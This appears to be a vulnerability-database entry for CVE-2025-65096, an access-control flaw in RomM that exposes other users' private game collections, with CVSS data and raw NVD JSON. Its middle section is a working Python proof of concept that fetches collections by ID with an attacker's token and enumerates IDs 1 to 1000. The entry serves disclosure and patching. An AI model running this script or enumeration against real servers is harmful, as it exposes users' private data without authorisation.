Security Vulnerability Report
中文
CVE-2025-65096 CVSS 4.3 MEDIUM

CVE-2025-65096

Published: 2025-12-03 20:16:26
Last Modified: 2026-02-24 20:01:59

Description

RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, users can read private collections / smart collections belonging to other users by directly accessing their IDs via API. No ownership verification or checking if the collection is public/private before returning collection data. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:* - VULNERABLE
RomM < 4.4.1
RomM 4.4.1-beta.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65096 PoC - RomM IDOR Vulnerability # Target: RomM < 4.4.1 and 4.4.1-beta.2 TARGET_URL = "http://target-romm-server.com" ATTACKER_TOKEN = "attacker_bearer_token_here" TARGET_COLLECTION_ID = 12345 # Enumerate or guess target collection ID def exploit_idor(): headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Access target user's private collection endpoint = f"{TARGET_URL}/api/collections/{TARGET_COLLECTION_ID}" try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Successfully accessed collection {TARGET_COLLECTION_ID}") print(f"[+] Collection data: {json.dumps(data, indent=2)}") return True elif response.status_code == 401: print("[-] Authentication failed") elif response.status_code == 403: print("[-] Access denied - collection is private") else: print(f"[-] Unexpected response: {response.status_code}") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def enumerate_collections(start_id=1, end_id=1000): """Enumerate collection IDs to find private collections""" found_collections = [] for collection_id in range(start_id, end_id + 1): endpoint = f"{TARGET_URL}/api/collections/{collection_id}" headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"} try: response = requests.get(endpoint, headers=headers, timeout=5) if response.status_code == 200: found_collections.append({ "id": collection_id, "data": response.json() }) print(f"[+] Found accessible collection ID: {collection_id}") except: continue return found_collections if __name__ == "__main__": print("CVE-2025-65096 PoC - RomM IDOR") print("=" * 50) exploit_idor()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65096", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.097", "lastModified": "2026-02-24T20:01:59.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, users can read private collections / smart collections belonging to other users by directly accessing their IDs via API. No ownership verification or checking if the collection is public/private before returning collection data. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.1", "matchCriteriaId": "3501BC54-F9F3-4C68-AD5E-142908B2948C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:*", "matchCriteriaId": "93D1318D-39AA-4BCF-BACF-A869B8444BAE"}]}]}], "references": [{"url": "https://github.com/rommapp/romm/security/advisories/GHSA-5ghc-8wr3-788c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}